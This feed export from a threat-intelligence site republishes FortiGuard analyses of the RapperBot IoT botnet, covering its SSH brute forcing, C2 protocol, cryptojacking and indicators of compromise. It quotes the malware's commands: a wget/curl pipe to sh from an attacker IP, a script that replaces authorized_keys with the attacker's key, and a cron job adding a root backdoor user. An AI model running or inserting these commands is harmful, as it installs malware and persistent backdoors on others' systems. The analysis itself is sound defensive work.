rapperbot - X-Industry - Red Sky Alliance2024-03-29T08:23:25Zhttps://redskyalliance.org/xindustry/feed/tag/rapperbotRapperBothttps://redskyalliance.org/xindustry/rapperbot-12023-05-12T12:05:00.000Z2023-05-12T12:05:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}11075060655,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}11075060655,RESIZE_400x{{/staticFileLink}}" alt="11075060655?profile=RESIZE_400x" width="250" /></a>FortiGuard Labs has encountered new samples of the RapperBot campaign active since January 2023. RapperBot is a malware family primarily targeting IoT devices. It has been observed in the wild since June 2022. FortiGuard Labs reported on its previous campaigns in <a href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery">August 2022</a> and <a href="https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks">December 2022</a>. Those campaigns focused on brute-forcing devices with weak or default SSH or Telnet credentials to expand the botnet’s footprint for launching <a href="https://www.fortinet.com/resources/cyberglossary/ddos-attack">Distributed Denial of Service</a> (DDoS) attacks.</p>
<p>In this campaign, these threat actors have started venturing into <a href="https://www.fortinet.com/resources/cyberglossary/cryptojacking">cryptojacking</a>, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot. The below report will discuss the changes observed in this new campaign and provide a technical analysis of the RapperBot variant upgraded with miner capabilities.<a href="#_ftn1">[1]</a></p>
<p>Same But Different – Analyst began observing the first samples of this RapperBot miner campaign in January 2023. They share some characteristics that allowed us to link this campaign to the earlier ones.</p>
<p>The most unique and enduring trait of RapperBot samples is the YouTube URL <a href="https://www.youtube.com/watch?v=4fm_ZZn5qaw">https://www.youtube.com/watch?v=4fm_ZZn5qaw</a>, which has been seen in most samples from this family. However, the string is never actually used in this campaign, unlike older samples where it prints the URL to the console at the start of execution.</p>
<p>Another indicator of a RapperBot campaign is adding an SSH public key to ~/.ssh/authorized_keys to maintain backdoor access to infected machines, even after the devices have been rebooted. This latest campaign uses the same key observed in the first campaign in June 2022 and is listed in the IOC section below.</p>
<p>Beyond these similarities, however, we also observed some key differences, including several significant updates to the malware functionality, particularly in its C2 communication protocol.</p>
<p>One cluster of ARM samples, such as 7c9e6d63bc1f26e9c8a8703439e12de12da9892f2d6cd9bda5f45ec00c98a29f (Cluster A) that were delivered via hxxp://109[.]206[.]243[.]207/ssh/arm7, were very minimal in functionality. They only included three DoS attack types and no SSH brute forcing or self-propagation abilities. However, these samples included new code to collect and send information about the infected system upon registering with the C2 server.</p>
<p>Another cluster of ARM samples delivered from the same URL, such as 912e151641f20f9d689c6ea26cf6f11d5ee0b6fdc4d4a1179fac413391748c65 (Cluster B), resembles the above samples but with the inclusion of the SSH brute-forcer last seen in the June 2022 campaign. Unlike that campaign, credentials are embedded in each sample and not downloaded from the C2 server. These samples propagate themselves by downloading and executing hxxp://109[.]206[.]243[.]207/d upon the successful brute force breach of a system.</p>
<p>As in past campaigns, all samples from this campaign still encode sensitive strings with XOR encoding. But this time, the developers have opted to add an extra layer of XOR encoding, with the first layer using multi-byte XOR keys with different values and lengths for each encoded string. The second layer uses the same style of single-byte XOR encoding as in previous campaigns, with the key calculated by XORing all bytes of the first layer key (Figure 1). This additional layer of XOR encoding prevents XOR brute forcing and the easy detection of malware-related strings.</p>
<p>The original draft was worded ambiguously, we meant to say that this campaign embedded the credentials in each sample. In the previous campaign, the credentials were downloaded from the C2 server.</p>
<p><em><a href="{{#staticFileLink}}11075060293,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11075060293,RESIZE_584x{{/staticFileLink}}" alt="11075060293?profile=RESIZE_584x" width="500" /></a>Figure 1: XOR string decoding</em></p>
<p>The structure of client requests to the Command-and-Control (C2) server has also been significantly updated. The unique 32-byte Bot ID sent with every request in previous campaigns has been removed. Instead, the request size is now variable, with random bytes generated to fill the unused parts of the request. Lastly, the request data is no longer located at fixed offsets within each request. We describe the communication protocol and request structure in more detail below.</p>
<p>Revamped C2 Communication Protocol - Upon execution, RapperBot connects to a hardcoded C2 server and sends a registration request (type 1) containing information about the victim system (Figure 2):</p>
<ol>
<li>Hardcoded value: 0x3 0xd3 0x4a 0xb6</li>
<li>Source: This is the first command line argument passed to the malware and usually indicates the infection vector (e.g., scan.ssh.x86_64)</li>
<li>Local IP address</li>
<li>UID (User identifier)</li>
<li>Current working directory</li>
<li>Number of processors</li>
<li>Total memory size</li>
<li>Open File Limit</li>
<li>Hostname</li>
<li>Processor model</li>
</ol>
<p><em><a href="{{#staticFileLink}}11075060301,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11075060301,RESIZE_584x{{/staticFileLink}}" alt="11075060301?profile=RESIZE_584x" width="500" /></a>Figure 2: System info sent in the registration request</em></p>
<p>After that, it sends a keep-alive request (type 3) to inform the C2 server that it is ready to receive commands. The malware then performs this request at random intervals of 60 to 600 seconds.</p>
<p>To evade detection, the binary network protocol used to send these requests has been completely revised. Like its string encoding, it uses a two-layer approach to encode the information sent to the C2 server. The header data must first be decoded to reveal the location of the encoded information and the key needed to decode it.</p>
<p>The size of each request is randomized, so shorter requests do not stand out in network traffic. The malware starts by generating a random number between 4 and 128, which we will refer to as RAND_VALUE, and a random XOR key for the content from 4 to 32 bytes long (referred to as KEY_SIZE).</p>
<p>The request size is then calculated as follows:</p>
<p><strong>REQUEST_SIZE = RAND_VALUE + KEY_SIZE + CONTENT_SIZE + 6</strong></p>
<p>The malware then generates a buffer of the same size and fills it with random bytes. The first byte of this buffer will be used as a XOR key (HEADER_KEY) for encoding the header data. The second byte will be overwritten with the RAND_VALUE XORed with the HEADER_KEY.</p>
<p>The request data is stored at HEADER_OFFSET, RAND_VALUE / 2.</p>
<p>The format of the structure starting at HEADER_OFFSET is as follows:</p>
<p>Offset 0x2: ENC_REQ_TYPE (Request type xor HEADER_KEY)</p>
<p>Offset 0x3: ENC_KEY_SIZE (KEY_SIZE xor HEADER_KEY)</p>
<p>Offset 0x4: Start of KEY</p>
<p>Offset KEY_SIZE + 0x4: ENC_CODE_SIZE ((little endian word containing CONTENT_SIZE rol 8 xor HEADER_KEY)</p>
<p>Offset KEY_SIZE + 0x6: Start of encoded content (ENC_CONTENT)</p>
<p><em><a href="{{#staticFileLink}}11075060469,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11075060469,RESIZE_584x{{/staticFileLink}}" alt="11075060469?profile=RESIZE_584x" width="500" /></a>Figure 3: Encoded registration request</em></p>
<p>All non-highlighted bytes in Figure 3 are unused padding bytes generated randomly by the malware. The Python code used to decode the content in each request with the HEADER_KEY and KEY is shown below:</p>
<p><a href="{{#staticFileLink}}11075060880,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11075060880,RESIZE_400x{{/staticFileLink}}" alt="11075060880?profile=RESIZE_400x" width="329" /></a>While we did not receive commands from the C2 server, our analysis shows that the bot supports the following commands with their corresponding IDs.</p>
<p>4: Perform DDoS attacks (UDP, TCP, and HTTP GET)</p>
<p>5: Stop DDoS attacks</p>
<p>6: Terminate itself (and any child processes)</p>
<p>Expanding into Cryptojacking - The change in the C2 communication protocol is not the only major update in this campaign. Until now, RapperBot has been primarily geared toward using its victims for DDoS operations. For this campaign, however, it has started to venture into abusing the resources of infected Intel x64 machines to mine for cryptocurrency, commonly known as Cryptojacking.</p>
<p>We observed that hxxp://109[.]206[.]243[.]207/ssh/x86_64 started serving Bash shell scripts instead of the usual RapperBot binary for the x64 architecture as early as January 12. These Bash scripts (example hash: 7f6e0fa785820075a61819ca6b272a239733b770eb8a92a4056cf5d26d89795f) downloaded and executed separate XMRig crypto miners (example hash: 0ad68d5804804c25a6f6f3d87cc3a3886583f69b7115ba01ab7c6dd96a186404) and RapperBot binaries, as seen in Figure 4.</p>
<p><em><a href="{{#staticFileLink}}11075060675,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11075060675,RESIZE_584x{{/staticFileLink}}" alt="11075060675?profile=RESIZE_584x" width="500" /></a>Figure 4: Bash script delivers bot and miner</em></p>
<p>XMRig is an open-source Monero miner commonly abused by threat actors for cryptojacking. Monero (XMR) is a popular cryptocurrency for illicit mining by threat actors because of its privacy-enhancing features. It is also designed to be more resistant to application-specific integrated circuit (ASIC) miners, which makes it possible to mine profitably with just consumer-grade hardware.</p>
<p>In late Jan 2023, FortiGuard Labs collected a significantly larger x64 sample f06d698967cee77e5a7bf9835b0a93394097e7590c156ed0d8c6304345701cfa, which used the same C2 server IP and communication protocol. On further analysis, we verified that the bot developers had merged the RapperBot C source code with the C++ code of XMRig Monero miner to create a combined bot client with mining capabilities.</p>
<p>Mining Under the Radar - Apart from executing the miner as a child process upon execution, these samples are functionally identical to those targeting ARM devices and do not have SSH brute-forcing or self-replication capabilities. Merging the bot and miner code might be an attempt to hide the mining pools and Monero wallet addresses (listed in the IOCs section) using the same double-layer XOR encoding so they are not exposed in the clear, as in the Bash script (Figure 4).</p>
<p>The miner code also contains several modifications to facilitate cryptojacking.</p>
<p>The ability to read external configuration files has been removed, so it always uses the configuration built into the binary itself. The bot decodes the mining pools and Monero wallet addresses and updates the hardcoded configuration before starting the embedded miner.</p>
<p>The miner is also configured to use multiple mining pools for both redundancy and additional privacy. Two of them are mining proxies hosted on the RapperBot C2 IP itself. This allows the threat actor to omit both the wallet addresses and actual mining pools from the miner configuration. Additionally, they can change this information on the proxy server without rebuilding and deploying new bots. Aside from this, it is also configured to directly use a public mining pool, likely as a backup if the C2 IP goes offline.</p>
<p>To prevent the termination of the miner process by the machine owner, the default signal handlers for SIGTERM, SIGUSR1, SIGINT, and SIGHUP signals have been removed. The usage information printed when executing the --help command line argument has also been removed, likely to evade detection by security products and competing miners from other cryptojacking groups. Likewise, the developers also replaced “XMRig" with “asbuasdbu" in the version information to prevent easy identification.</p>
<p>To maximize mining efficiency, it kills off other miners by enumerating other running processes and attempts to scan the associated binaries on disk for the following blacklisted keywords. These processes are then terminated, and the corresponding files are deleted. For example, “--algo” in the list below is part of the usage information printed by standard XMRig miners.</p>
<ul>
<li>xmrig</li>
<li>.rsync</li>
<li>miner</li>
<li>moner</li>
<li>UPX!</li>
<li>--algo</li>
<li>network01</li>
<li>faster than light</li>
<li>dota2</li>
<li>.rsync</li>
<li>cat /proc/cpuinfo</li>
<li>/etc/cron.hourly/gcc.sh</li>
<li>/etc/daemon.cfg</li>
<li>denyip=</li>
</ul>
<p>If the binaries are not readable, it will look for blacklisted keywords within the file paths, terminate the processes, and delete the associated files.</p>
<ul>
<li>/shm/</li>
<li>/dev/netslink/</li>
<li>/tmp/</li>
<li>xmrig</li>
<li>.X19-unix</li>
<li>netwalker</li>
<li>(deleted)</li>
<li>.rsync</li>
<li>/a/</li>
<li>/b/</li>
<li>/c/</li>
<li>miner</li>
<li>dota</li>
<li>network01</li>
<li>xrx</li>
<li>/.x</li>
</ul>
<p>Lastly, it will terminate processes containing the blacklisted keywords in the process path or its command line arguments. Processes with path or command-line arguments containing “/zvx/” are whitelisted and never terminated.</p>
<ul>
<li>wget</li>
<li>curl</li>
<li>netstat</li>
<li>kill</li>
<li>3333</li>
<li>zmap</li>
<li>tsm</li>
<li>passwd</li>
<li>netwalk</li>
<li>zzh</li>
<li>xrx</li>
<li>pnscan</li>
<li>xri</li>
</ul>
<p>Based on the keywords used, the bot developers are more interested in terminating other miners than other IoT bots. This reaffirms their focus on cryptojacking vs DDoS attacks, at least on x64 machines.</p>
<p>As a side note, we have not discovered an infection vector that directly delivers x64 RapperBot, as none of the RapperBot samples with an integrated miner appear to have self-propagation capabilities. This suggests the possible availability of an external loader operated by the threat actor that abuses the credentials collected by other RapperBot samples with brute forcing capabilities and infects only x64 machines with the combined bot/miner.</p>
<p>Alternatively, the addition of the threat actor’s public SSH key in infected machines might provide another point of entry for these x64 samples.</p>
<p>Conclusion - Financially motivated botnet operators are always on the lookout to extract the maximum value from machines infected by their botnets. The threat actors behind the RapperBot botnet are no exception, as evident in their addition of cryptojacking capabilities to target x64 machines.</p>
<p>RapperBot continues to be a dangerous threat due to its continual updates to evade detection, as highlighted above. As its primary infection vector of compromising SSH services using weak or default passwords remains the same, mitigating it by enabling public key authentication or setting strong passwords for all devices connected to the internet is still effective in mitigating this threat.</p>
<p><strong>IOCs</strong></p>
<p>Files:</p>
<p>RapperBot</p>
<ul>
<li>7c9e6d63bc1f26e9c8a8703439e12de12da9892f2d6cd9bda5f45ec00c98a29f</li>
<li>912e151641f20f9d689c6ea26cf6f11d5ee0b6fdc4d4a1179fac413391748c65</li>
<li>f06d698967cee77e5a7bf9835b0a93394097e7590c156ed0d8c6304345701cfa</li>
<li>6c034ff9b5447da62822e3231e5e2d5db225756b3e216f6fc469469cb1d81813</li>
<li>dfaffe78b8ccb03626c2f55596f977da917e8e9a00ee7576ce9eca688d88447d</li>
<li>95aa6882f5ea5a892ef832ef15dea77261394a7fec6db9d91267d40f1cf2bfa5</li>
</ul>
<p> </p>
<p>XMRig miner</p>
<ul>
<li>0ad68d5804804c25a6f6f3d87cc3a3886583f69b7115ba01ab7c6dd96a186404</li>
</ul>
<p> </p>
<p>Bash scripts</p>
<ul>
<li>bd87ac780e574ae8415907f88a3b48af578bb269308b56826e2f33438559e4b7</li>
<li>3296598c79748322dfff8eb786705d048725c04b23dd3a293f52a1acafe9e7ae</li>
<li>7f6e0fa785820075a61819ca6b272a239733b770eb8a92a4056cf5d26d89795f </li>
</ul>
<p> </p>
<p>Download URLs</p>
<ul>
<li>hxxp://109[.]206[.]243[.]207/d</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/arm4</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/arm5</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/arm6</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/arm7</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/bot</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/scan_arm4</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/scan_arm5</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/scan_arm6</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/scan_arm7</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/x86_64</li>
<li>hxxp://109[.]206[.]243[.]207/ssh/xmrig</li>
<li>hxxp://171[.]22[.]136[.]15/arm4</li>
<li>hxxp://171[.]22[.]136[.]15/arm5</li>
<li>hxxp://171[.]22[.]136[.]15/arm6</li>
<li>hxxp://171[.]22[.]136[.]15/arm7</li>
</ul>
<p> </p>
<p>C2s</p>
<ul>
<li>109[.]206[.]243[.]207</li>
<li>171[.]22[.]136[.]15</li>
</ul>
<p> </p>
<p>Mining Pools</p>
<ul>
<li>109[.]206[.]243[.]207:31271</li>
<li>109[.]206[.]243[.]207:25621</li>
<li>pool[.]hashvault[.]pro:80</li>
</ul>
<p> </p>
<p>Monero Wallets</p>
<ul>
<li>43Zs6jyniktVUNfiN8NY16TrvFKWbx3qogoRvstuquZdVA8EXvhqhz1W4hUzpjQXHAf3pDQ8UXxegFh8G26uCycKPz41ceW</li>
</ul>
<p> </p>
<ul>
<li>47RupsxSjeHb4sHMwJ681vbjpFHAwXg6kMn1znbioqy96Qj9j2VuHrD2mXsEReELEdjRsDVKBK3Ru3diW3AgZ41Z7mzDwb4</li>
</ul>
<p> </p>
<p>SSH Key</p>
<p>AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== system key generated by server 20220709</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com</p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/550422929596">https://attendee.gotowebinar.com/register/550422929596</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking/">https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking/</a></p></div>Weekly Cyber Intel Report - All Sector 11 25 2022https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-11-25-20222022-11-25T13:57:24.000Z2022-11-25T13:57:24.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><span style="font-size:12pt;"><a href="{{#staticFileLink}}10891633057,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10891633057,RESIZE_400x{{/staticFileLink}}" width="250" alt="10891633057?profile=RESIZE_400x" /></a>Activity Summary - Week Ending on 25 November 2022:</span></h2>
<ul>
<li>Red Sky Alliance identified 26,613 connections from new IP’s checking in with our Sinkholes</li>
<li>Contabo GmbH in Germany hit 100x</li>
<li>Analysts identified 769 new IP addresses participating in various Botnets</li>
<li>New RapperBot Campaign</li>
<li>Somnia Ransomware</li>
<li>New Inlock and Xorist Variants</li>
<li>Debugging .NET Malware</li>
<li>Iranian Drones</li>
<li>City of Westmount, Quebec hit</li>
<li>Nord Stream2 and AIS</li>
<li>Kiwi Attacks</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}10891632498,original{{/staticFileLink}}">IR-22-329-001_weekly329.pdf</a></p></div>RapperBothttps://redskyalliance.org/xindustry/rapperbot2022-08-21T14:33:32.000Z2022-08-21T14:33:32.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10779952674,RESIZE_1200x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10779952674,RESIZE_400x{{/staticFileLink}}" width="250" alt="10779952674?profile=RESIZE_400x" /></a>FortiGuard Labs researchers have been tracking a quickly evolving IoT malware family known as “RapperBot” since mid-June 2022. This family borrows heavily from the original Mirai source code, but what separates it from other IoT malware families is its built-in capability to brute force credentials and gain access to SSH servers instead of Telnet as implemented in Mirai. In addition, recent samples show that its developers have started adding code to maintain persistence, which is rarely done in other Mirai variants. This provides threat actors with continued access to infected devices via SSH even after the device is rebooted or the malware has been removed. This shared report reveals how this threat infects and persists on a victim device, as well as interesting changes that make us question the real intention of the threat actors.<a href="#_ftn1">[1]</a></p>
<p><strong>Affected Platforms</strong>: Linux</p>
<p><strong>Impacted Users</strong>: Any organization</p>
<p><strong>Impact</strong>: Remote attackers gain control of the vulnerable systems</p>
<p><strong>Severity Level</strong>: <u>Critical</u></p>
<p><a href="#_ftn1"></a>Discovery: In June 2022, researchers encountered IoT malware samples with SSH-related strings, something not often seen in other IoT threat campaigns. What piqued our interest more was the size of the code referencing these strings in relation to the code used for DDoS attacks, which usually comprises most of the code in other variants. Upon further analysis, they discovered that this malware family, titled "RapperBot,” is designed to function primarily as an SSH brute forcer with limited DDoS capabilities. As is typical of most IoT malware, it targets ARM, MIPS, SPARC, and x86 architectures. The name “RapperBot” comes from an early July report from <a href="https://www.ics-cert.org.cn/portal/page/112/1208496c5e164aceb8dadd08ab993dd2.html">CNCERT</a> where an embedded URL to a YouTube rap music video was found in older samples. The samples of RapperBot released after this report do not contain this URL.</p>
<p>Analysis: RapperBot heavily reuses parts of the Mirai source code, but its features and implementation details, e.g., the Command & Control (C2) command protocol, differs significantly from the original Mirai and typical Mirai-based variants monitored by FortiGuard Labs. Unlike the majority of Mirai variants, which natively brute force Telnet servers using default or weak passwords, RapperBot exclusively scans and attempts to brute force SSH servers configured to accept password authentication. The bulk of the malware code contains an implementation of an SSH 2.0 client that can connect and brute force any SSH server that supports Diffie-Hellmann key exchange with 768-bit or 2048-bit keys and data encryption using AES128-CTR.</p>
<p>A distinctive feature of the brute forcing implementation in RapperBot is the use of “SSH-2.0-HELLOWORLD” to identify itself to the target SSH server during the SSH Protocol Exchange phase. The appearance of this RapperBot in mid-June coincides with the observation of this same client identification string by <a href="https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872">SANS Internet Storm Center</a> in their honeypot logs. Earlier samples had the brute-forcing credential list hardcoded into the binary. From July onwards, samples now retrieve this list from another port on the C2 server. This allows the threat actors to continually add new SSH credentials without having to update infected devices with new samples. This port number ranges from 4343 to 4345 in the latest samples. Once RapperBot successfully brute forces an SSH server, the valid credentials are reported to the C2 server on a separate port (currently 48109) without executing further commands on the remote victim.</p>
<p>In late June, however, FortiGuard Labs found some samples that attempted to self-propagate via a remote binary downloader post-compromise. The commands executed on the compromised SSH server are shown below.</p>
<ul>
<li>Sh</li>
<li>Enable</li>
<li>Shell</li>
<li>Debug</li>
<li>Shell</li>
<li>cmd wget</li>
<li>http://2[.]58[.]149[.]116/w -O- | sh; curl http://2[.]58[.]149[.]116/c -O- | sh</li>
</ul>
<p>For unknown reasons, this propagation functionality was removed in samples collected a few days later and has not been seen in subsequent samples. As with the original Mirai, analysts suspect the threat actors have implemented a separate loader system that would subsequently connect to the victim to download and execute the bot client.</p>
<p>Since mid-July 2022, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers. It runs a shell command to replace remote victims’ ~/.ssh/authorized_keys with one containing the threat actors’ SSH public key with the comment “helloworld,” as shown below.</p>
<p>cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vs Hc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweY qTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1J FJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziis Zze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v 2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;</p>
<p>Public keys stored in ~/.ssh/authorized_keys allow anyone with the corresponding private key to connect and authenticate to a SSH server without needing to supply a password. This presents a threat to compromised SSH servers as threat actors can access them even after SSH credentials have been changed or SSH password authentication is disabled. Moreover, since the file is replaced, all existing authorized keys are deleted, which prevents legitimate users from accessing the SSH server via public key authentication.</p>
<p>Apart from maintaining access to every SSH server that it brute forces, RapperBot is also very intent on retaining its foothold on any devices on which it is executed. Samples from mid-July append the same aforementioned SSH key to the local "~/.ssh/authorized_keys" on the infected device upon execution. This allows RapperBot to maintain its access to these infected devices via SSH even after a device reboot or the removal of RapperBot from the device – something that is atypical to most Mirai variants. To better hide in plain sight, the latest samples use a more innocuous comment "system key generated by server 20220709" for the public key instead of “helloworld.”</p>
<p>In the latest RapperBot samples, the malware also started adding the root user "suhelper” to the infected device by directly writing to “/etc/passwd” and “/etc/shadow/”, further allowing the threat actor to take complete control of the device. In conjunction, it adds the root user account every hour by writing the following script to “/etc/cron.hourly/0” in the event that other users (or botnets) attempt to remove their account from the victim system. The command to add the root user is provided below.</p>
<p>#!/bin/sh<br /> <br /> useradd -u 0 -g 0 -o -d / suhelper -p '$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/' >/dev/null 2>&1</p>
<p> </p>
<p>Figure 1. illustrates how the latest samples of RapperBot work. Dotted lines indicate potential actions that FortiGuard Labs assesses that the threat actor could perform but have not been observed in the wild.</p>
<p><a href="{{#staticFileLink}}10779952870,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10779952870,RESIZE_400x{{/staticFileLink}}" width="350" alt="10779952870?profile=RESIZE_400x" /></a></p>
<p>Figure 1. (left) RapperBot execution flow</p>
<p> </p>
<p>While early samples had strings in plaintext, subsequent samples added extra obfuscation to the strings by building them on the stack. This prevents common analysis tools and detection techniques from extracting human-readable strings from binary files (Figure 2).</p>
<p> </p>
<p> </p>
<p> </p>
<p><a href="{{#staticFileLink}}10779953265,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}10779953265,RESIZE_400x{{/staticFileLink}}" width="350" alt="10779953265?profile=RESIZE_400x" /></a>Figure 2 (above).</p>
<p>These latest samples implemented an additional layer of Mirai-style XOR encoding to hide these strings from memory scanners during execution. While most Mirai and Gafgyt botnet operators, like <a href="https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet">Keksec</a>, tend to include strings identifying themselves within the malware samples, the developers of this malware maintain a relatively low profile (apart from occasional references to rap music).</p>
<p>Network Protocol: RapperBot communicates with its C2 server via TCP requests at separate ports to receive commands (443 in the latest samples), download SSH credential lists, or report valid credentials during SSH brute forcing. The network protocol for commands is explained in further detail below. Each request contains a bot ID, a 32-byte value hardcoded in the binary. FortiGuard Labs observed two IDs as follows:</p>
<p>d4 1c 74 44 70 95 28 ff f0 98 ae 4e 6f 92 ba d5 0f cd 56 29 c5 12 53 a1 fe 46 53 c7 0b b5 18 27</p>
<p>f6 b7 0b 00 14 77 35 f9 8d 6d 5d c4 bd 23 88 7e cf 5e 02 ce 54 5f e7 b1 e6 3f 2a 16 71 b6 eb 9a (<em>a separate cluster seen only in late December 2021</em>)</p>
<p>As a side note, pivoting on these bot IDs allowed us to find older samples from November 2021. However, the SSH brute forcing capability was only seen in samples from mid-June 2022.</p>
<p>RapperBot starts by sending a registration packet to the C2 server. This includes the argument (referred to as “source” by Mirai) used when the binary was executed in the victim system, which usually provides some basic contextual info about its execution. For instance, “ssh.wget.arm7” would tell the C2 that the binary was spread via SSH protocol, downloaded via the wget utility, and is of ARM architecture.</p>
<p>The succeeding communication uses the following structure:</p>
<p>struct rapperbot_registration {</p>
<p> byte bot_id[32];</p>
<p> int command_code;</p>
<p> source [32];</p>
<p>};</p>
<p>Here are the command codes supported by RapperBot:</p>
<p><strong>0x00</strong>: Register (used by the client)</p>
<p><strong>0x01</strong>: Keep-Alive/Do nothing</p>
<p><strong>0x02:</strong> Stop all DoS attacks and terminate the client</p>
<p><strong>0x03</strong>: Perform a DoS attack</p>
<p><strong>0x04</strong>: Stop all DoS attacks</p>
<p>Right after the registration packet, the client sends another request to notify the C2 that the client is ready to receive commands. The C2 server usually responds with a keep-alive command to acknowledge the request (Figure 3).</p>
<p><a href="{{#staticFileLink}}10779953284,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10779953284,RESIZE_400x{{/staticFileLink}}" width="350" alt="10779953284?profile=RESIZE_400x" /></a></p>
<p>Figure 3: (left) RapperBot client-server communication</p>
<p>Besides the keep-alive command, we did not observe any other commands from the C2 server during our analysis.</p>
<p>However, RapperBot does support a very minimal set of DoS attacks, including plain UDP and TCP STOMP flood attacks that are very similar to Mirai’s implementation.</p>
<p> </p>
<p> </p>
<p>The attack command structure is as follows:</p>
<p>struct rapperbot_attack_command</p>
<p> {</p>
<p> byte bot_id[32];</p>
<p> int command_code; // 0x03<br /> byte vector; // type of DoS attack<br /> ushort target_port;<br /> int duration;<br /> int target_ip;<br /> };<br /> </p>
